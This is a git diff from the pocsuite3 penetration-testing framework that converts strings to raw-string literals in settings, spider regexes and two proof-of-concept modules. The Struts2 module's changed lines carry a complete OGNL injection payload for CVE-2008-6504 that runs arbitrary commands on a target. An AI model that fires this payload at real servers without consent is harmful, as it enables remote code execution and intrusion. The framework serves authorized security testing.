diff --git a/pocsuite3/lib/core/settings.py b/pocsuite3/lib/core/settings.py index cec7b82e..8246f9ec 100644 --- a/pocsuite3/lib/core/settings.py +++ b/pocsuite3/lib/core/settings.py @@ -39,7 +39,7 @@ "Usage of pocsuite for attacking targets without prior mutual consent is illegal." ) -BANNER = """\033[01;33m +BANNER = r"""\033[01;33m ,------. ,--. ,--. ,----. \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m | .--. ',---. ,---.,---.,--.,--`--,-' '-.,---.'.-. | | '--' | .-. | .--( .-'| || ,--'-. .-| .-. : .' < @@ -57,7 +57,7 @@ BOLD_PATTERNS = ( "' is vulnerable", "success", - "\d ", + r"\d ", ) OLD_VERSION_CHARACTER = ("from comm import cmdline", "from comm import generic") diff --git a/pocsuite3/modules/spider/__init__.py b/pocsuite3/modules/spider/__init__.py index 75c65dea..68a053e1 100644 --- a/pocsuite3/modules/spider/__init__.py +++ b/pocsuite3/modules/spider/__init__.py @@ -73,9 +73,9 @@ def get_links(self, url, url_ext=()): def get_redirect_url(url): # TODO: # regex need more test cases - meta_regex = '(?is)\]*?url\s*=([\d\w://\\\\.?=&;%-]*)[^<>]*' - body_regex = '''(?is)\]*?location[\s\.\w]*=['"]?([\d\w://\\\\.?=&;%-]*)['"]?[^<>]*''' - js_regex = '''(?is)[^<>]*?location\.(?:replace|href|assign)[=\("']*([\d\w://\\\\.?=&;%-]*)[^<>]*?''' + meta_regex = r'(?is)\]*?url\s*=([\d\w://\\\\.?=&;%-]*)[^<>]*' + body_regex = r'''(?is)\]*?location[\s\.\w]*=['"]?([\d\w://\\\\.?=&;%-]*)['"]?[^<>]*''' + js_regex = r'''(?is)[^<>]*?location\.(?:replace|href|assign)[=\("']*([\d\w://\\\\.?=&;%-]*)[^<>]*?''' resp = requests.get(url) true_url = resp.url diff --git a/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py b/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py index e7cd9af9..a2d14eae 100644 --- a/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py +++ b/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py @@ -36,7 +36,7 @@ def _verify(self): r = requests.post(paylaod, data=data, headers=headers) if r.status_code == 200 and "" in r.text: - m = re.search('', r.text) + m = re.search(r'', r.text) if m: content = m.group()[:limitSize] result['FileInfo'] = {} diff --git a/pocsuite3/pocs/Apache_Struts2/20090323_WEB_Apache_Struts2_003_RCE_CVE-2008-6504.py b/pocsuite3/pocs/Apache_Struts2/20090323_WEB_Apache_Struts2_003_RCE_CVE-2008-6504.py index eae674c7..09d6d3bd 100755 --- a/pocsuite3/pocs/Apache_Struts2/20090323_WEB_Apache_Struts2_003_RCE_CVE-2008-6504.py +++ b/pocsuite3/pocs/Apache_Struts2/20090323_WEB_Apache_Struts2_003_RCE_CVE-2008-6504.py @@ -31,7 +31,7 @@ def _options(self): def _check(self): result = {} - exec_payload = "(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\u003d@java.lang.Runtime@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))" + exec_payload = r"(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\u003d@java.lang.Runtime@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))" # noqa: E501 paylaod = exec_payload.format(cmd=quote("id")) r = requests.get(self.url + "?" + paylaod) if "groups=" in r.text: @@ -52,7 +52,7 @@ def _attack(self): result = {} if p: cmd = self.get_option("command") - exec_payload = "(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\u003d@java.lang.Runtime@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))" + exec_payload = r"(%27\\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\\u003dfalse%27)(bla)(bla)&(%27\\u0023_memberAccess.excludeProperties\\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&(%27\\u0023mycmd\\u003d\%27{cmd}\%27%27)(bla)(bla)&(%27\\u0023myret\\u003d@java.lang.Runtime@getRuntime().exec(\\u0023mycmd)%27)(bla)(bla)&(A)((%27\\u0023mydat\\u003dnew\\40java.io.DataInputStream(\\u0023myret.getInputStream())%27)(bla))&(B)((%27\\u0023myres\\u003dnew\\40byte[51020]%27)(bla))&(C)((%27\\u0023mydat.readFully(\\u0023myres)%27)(bla))&(D)((%27\\u0023mystr\\u003dnew\\40java.lang.String(\\u0023myres)%27)(bla))&(%27\\u0023myout\\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&(E)((%27\\u0023myout.getWriter().println(\\u0023mystr)%27)(bla))" # noqa: E501 payload = exec_payload.format(cmd=quote(cmd)) r = requests.get(self.url + "?" + payload) if r.text: